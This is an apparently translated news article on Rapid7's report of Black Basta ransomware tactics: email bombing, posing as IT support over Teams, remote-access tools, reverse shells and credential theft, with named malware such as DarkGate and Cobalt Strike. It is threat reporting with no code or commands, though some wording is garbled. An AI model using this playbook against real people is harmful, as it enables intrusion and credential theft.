Black Basta ransomware has emerged with more sophisticated social engineering tactics and has begun utilizing a variety of malware as well as legitimate management tools.
A ransomware organization known as Black Basta has been active since October, with a particular focus on social engineering attacks, security firm Rapid7 warns. The campaign originally began in May, but in August, the organization changed its strategy and tactics, and in October, the new approach was actively applied. New malware and malware distribution strategies, as well as improved detection evasion techniques, are notable.
The new campaigns start similarly to the old ones, Rapid7 said. “The attacker first sends an email bomb to the victim. A lot of emails end up in the victim's inbox, which makes it difficult for the victim to use their email normally. Then the attackers reach out to the victim, usually through MS Teams, but sometimes they make a phone call or send a text message. The goal is to lure the victim in by saying, “Hey, you're having problems with your email and I can help. They usually pretend to be from the IT support team of the victim's company, so it's easy for the victim to fall for it.”
Once the victim is fooled and starts to respond, the attacker takes the next step. The next step is to install a remote management tool. With legitimate tools like QuickAssist, AnyDesk, TeamViewer, Level, and ScreenConnect, it's hard for victims to be suspicious. “But that's not all,” he adds, ”they also exploited OpenSSH clients to set up reverse shells, and shared queue alcodes, presumably to get the user's credentials and get past multi-factor authentication mechanisms.”
So far, this is an attempt to get into the victim's system. If successful, the next step is to plant the malicious payload, which can be done in a variety of ways. Rapid7 explains that these include
1) Compromised SharePoint instances
2) File-sharing websites
3) Servers leased through hosting providers
4) Direct uploads via remote administration proxy tools and remote control.
The reason for planting the payload is to accomplish several objectives, some of which include
1) Quickly identify various elements within the victim's environment, while simultaneously stealing the victim's credentials.
2) Steal VPN configuration files.
3) Bypass multi-factor authentication and use VPN information and credentials to penetrate deeper into the network.
To accomplish these goals, BlackBastar has used a number of tools and malware, including the following
1) Credential Collector
2) Zbot: a type of malware loader
3) DarkGate: a type of malware loader
4) Cobalt Strike Beacon: a kind of malware loader
5) Multithreaded Beacon: Ability to remotely execute a Powershell
Now here's where things get weird. This is a ransomware organization, but they're not using ransomware payloads. “Ransomware attackers are evolving rapidly, and we can see where they're headed. First of all, they're leveraging legitimate, normal tools, and even if they're not, they're disguising them to look legitimate. And secondly, even though they're ransomware actors, they're putting more emphasis on stealing information than they are on embarrassing their victims with ransomware.”
Comments